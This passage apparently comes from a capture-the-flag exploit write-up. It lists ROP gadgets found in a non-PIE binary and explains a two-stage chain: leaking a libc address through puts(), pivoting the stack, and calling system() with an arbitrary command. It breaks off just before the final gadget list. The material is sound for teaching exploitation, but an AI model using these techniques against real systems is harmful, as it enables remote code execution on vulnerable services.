0x0000000000400f68<\/span> :<\/span> nop <\/span>dword <\/span>ptr<\/span> [<\/span>rax<\/span> +<\/span> rax<\/span>]<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c40<\/span> :<\/span> out <\/span>dx<\/span>,<\/span> eax<\/span> ;<\/span> mov <\/span>eax<\/span>,<\/span> 1<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400aa8<\/span> :<\/span> pop <\/span>r12<\/span> ;<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>r14<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400f5c<\/span> :<\/span> pop <\/span>r12<\/span> ;<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>r14<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400d99<\/span> :<\/span> pop <\/span>r12<\/span> ;<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400aaa<\/span> :<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>r14<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400f5e<\/span> :<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>r14<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400d9b<\/span> :<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400aac<\/span> :<\/span> pop <\/span>r14<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400f60<\/span> :<\/span> pop <\/span>r14<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400aae<\/span> :<\/span> pop <\/span>r15<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400f62<\/span> :<\/span> pop <\/span>r15<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400be2<\/span> :<\/span> pop <\/span>rbp<\/span> ;<\/span> mov <\/span>byte<\/span> ptr<\/span> [<\/span>rip<\/span> +<\/span> 0x205586<\/span>]<\/span>,<\/span> 1<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400b81<\/span> :<\/span> pop <\/span>rbp<\/span> ;<\/span> mov <\/span>edi<\/span>,<\/span> 0x606160<\/span> ;<\/span> jmp <\/span>rax<\/span><\/div>\n
0x0000000000400bbe<\/span> :<\/span> pop <\/span>rbp<\/span> ;<\/span> mov <\/span>rsi<\/span>,<\/span> rax<\/span> ;<\/span> mov <\/span>edi<\/span>,<\/span> 0x606160<\/span> ;<\/span> jmp <\/span>rdx<\/span><\/div>\n
0x0000000000400f5b<\/span> :<\/span> pop <\/span>rbp<\/span> ;<\/span> pop <\/span>r12<\/span> ;<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>r14<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400aab<\/span> :<\/span> pop <\/span>rbp<\/span> ;<\/span> pop <\/span>r14<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400f5f<\/span> :<\/span> pop <\/span>rbp<\/span> ;<\/span> pop <\/span>r14<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400d9c<\/span> :<\/span> pop <\/span>rbp<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400ab0<\/span> :<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400d98<\/span> :<\/span> pop <\/span>rbx<\/span> ;<\/span> pop <\/span>r12<\/span> ;<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400aaf<\/span> :<\/span> pop <\/span>rdi<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400f63<\/span> :<\/span> pop <\/span>rdi<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400aad<\/span> :<\/span> pop <\/span>rsi<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400f61<\/span> :<\/span> pop <\/span>rsi<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400aa9<\/span> :<\/span> pop <\/span>rsp<\/span> ;<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>r14<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400f5d<\/span> :<\/span> pop <\/span>rsp<\/span> ;<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>r14<\/span> ;<\/span> pop <\/span>r15<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400d9a<\/span> :<\/span> pop <\/span>rsp<\/span> ;<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400be6<\/span> :<\/span> push <\/span>rbp<\/span> ;<\/span> and<\/span> byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>ebx<\/span>,<\/span> esi<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c04<\/span> :<\/span> push <\/span>rbp<\/span> ;<\/span> mov <\/span>edi<\/span>,<\/span> 0x605e20<\/span> ;<\/span> mov <\/span>rbp<\/span>,<\/span> rsp<\/span> ;<\/span> call <\/span>rax<\/span><\/div>\n
0x00000000004019de<\/span> :<\/span> rdmsr<\/span> ;<\/span> sysenter<\/span><\/div>\n
0x00000000004007a9<\/span> :<\/span> ret<\/span><\/div>\n
0x00000000004008d2<\/span> :<\/span> ret<\/span> 0x2057<\/span><\/div>\n
0x0000000000400ca2<\/span> :<\/span> ret<\/span> 0x4802<\/span><\/div>\n
0x0000000000400ba5<\/span> :<\/span> ret<\/span> 0xc148<\/span><\/div>\n
0x0000000000400cc2<\/span> :<\/span> ret<\/span> 0xe2d3<\/span><\/div>\n
0x0000000000400cb3<\/span> :<\/span> rol <\/span>dword <\/span>ptr<\/span> [<\/span>rcx<\/span>]<\/span>,<\/span> –<\/span>0x7d<\/span> ;<\/span> stc<\/span> ;<\/span> add <\/span>al<\/span>,<\/span> 0x75<\/span> ;<\/span> mov <\/span>ah<\/span>,<\/span> 0x5d<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400bac<\/span> :<\/span> ror <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span> –<\/span> 0x2f<\/span>]<\/span>,<\/span> 1<\/span> ;<\/span> clc<\/span> ;<\/span> jne<\/span> 0x400bbb<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400bae<\/span> :<\/span> sar <\/span>eax<\/span>,<\/span> 1<\/span> ;<\/span> jne<\/span> 0x400bb9<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400bad<\/span> :<\/span> sar <\/span>rax<\/span>,<\/span> 1<\/span> ;<\/span> jne<\/span> 0x400bba<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400cb6<\/span> :<\/span> stc<\/span> ;<\/span> add <\/span>al<\/span>,<\/span> 0x75<\/span> ;<\/span> mov <\/span>ah<\/span>,<\/span> 0x5d<\/span> ;<\/span> ret<\/span><\/div>\n
0x00000000004019db<\/span> :<\/span> sub <\/span>al<\/span>,<\/span> 0xf<\/span> ;<\/span> rdmsr<\/span> ;<\/span> sysenter<\/span><\/div>\n
0x00000000004019d9<\/span> :<\/span> sub <\/span>byte<\/span> ptr<\/span> [<\/span>rdi<\/span>]<\/span>,<\/span> cl<\/span> ;<\/span> sub <\/span>al<\/span>,<\/span> 0xf<\/span> ;<\/span> rdmsr<\/span> ;<\/span> sysenter<\/span><\/div>\n
0x0000000000400f75<\/span> :<\/span> sub <\/span>esp<\/span>,<\/span> 8<\/span> ;<\/span> add <\/span>rsp<\/span>,<\/span> 8<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400f74<\/span> :<\/span> sub <\/span>rsp<\/span>,<\/span> 8<\/span> ;<\/span> add <\/span>rsp<\/span>,<\/span> 8<\/span> ;<\/span> ret<\/span><\/div>\n
0x00000000004019e0<\/span> :<\/span> sysenter<\/span><\/div>\n
0x0000000000400f6a<\/span> :<\/span> test <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c4a<\/span> :<\/span> test <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> xor<\/span> eax<\/span>,<\/span> eax<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400be5<\/span> :<\/span> xchg <\/span>byte<\/span> ptr<\/span> [<\/span>rbp<\/span> +<\/span> 0x20<\/span>]<\/span>,<\/span> dl<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rcx<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c50<\/span> :<\/span> xor<\/span> eax<\/span>,<\/span> eax<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
<\/div>\n
Unique <\/span>gadgets <\/span>found<\/span>:<\/span> 112<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

There does not seem to be any obvious gadgets available for setting RDX, and unfortunately, RDX is set to 0 (as a side effect of the call to fclose() before returning from append_highscore(), at least when running it on my own system while testing) when the function epilogue for reached_goal() is executed. Since RDX can be set as a side-effect when calling functions, we can try looking for \u201charmless\u201d functions to return into in order to set RDX to a non-zero value though.<\/p>\n

We also still have the problem of not knowing the base address of libc, and maybe there\u2019s a way to solve both of these problems at once. \ud83d\ude42 By returning into the PLT-entry for puts(), that prints a string (or rather, prints any data up until the first NUL-byte it encounters), with RDI set to an address that contains a pointer into libc (such as a GOT-entry), we are able to both set RDX as a side-effect of the call to puts(), as well as leak a libc address that can be used to calculate the address of arbitrary libc functions. The fact that puts() also happens to set RDX as a side-effect was just a lucky coincidence, but if it hadn\u2019t, there were a number of other functions we could try to call for that purpose.<\/p>\n

Our original plan of simply returning into reached_goal(), right before the call to fopen(), is now obsolete. Since we have now leaked a libc address, we can simply use the read() in order to read a second stage ROP chain into a known location and then pivot the stack into that. The exploit will read the leaked address (a pointer to puts() in libc, by reading the GOT-entry for puts() in the address space of the non-PIE binary), calculate the base address of libc from that, and then the address of system(). Since we have just read arbitrary data into a known location, we can also place an arbitrary command string to be executed there, rather than using the \u201c\/bin\/sh\u201d string from libc. This also makes it more suitable for cases where we don\u2019t know which libc version is used on the target system, since we only have to bruteforce one offset (between puts() and system()) rather than also having to know the address of the \u201c\/bin\/sh\u201d string. Another possibility, in that case, would be to use puts()-calls to leak data at page-boundaries below the leaked puts()-address, in order to find the base address of libc, and then implement symbol resolving by parsing the ELF header. That was actually what I ended up doing on the cfy-challenge, after my attempts that assumed an Ubuntu 14.04 libc failed (it turned out to be Ubuntu 14.10). \ud83d\ude1b<\/p>\n

The only remaining piece of the puzzle at this point are gadgets to perform the stack pivot, into our second stage ROP chain. For this, we can use a \u201cpop rbp; ret\u201d gadget, that can be found at address 0x400AB0, in order to populate RBP. Then we use the \u201cleave; ret\u201d-equivalent in the function epilogue of reached_goal(), that I have already mentioned<\/a> earlier, in order to point RSP into our second stage ROP chain. For the first stage ROP chain we also need a simple ret-gadget (such as the one at 0x400F64), since we do not know the exact offset into our buffer where the stack will be shifted (it will vary with each execution). By just filling the start of the buffer with addresses of ret-instructions, it will keep on returning until it reaches our ROP chain that we have placed right at the end of the buffer.<\/p>\n

To sum it up. The gadgets we need are:<\/p>\n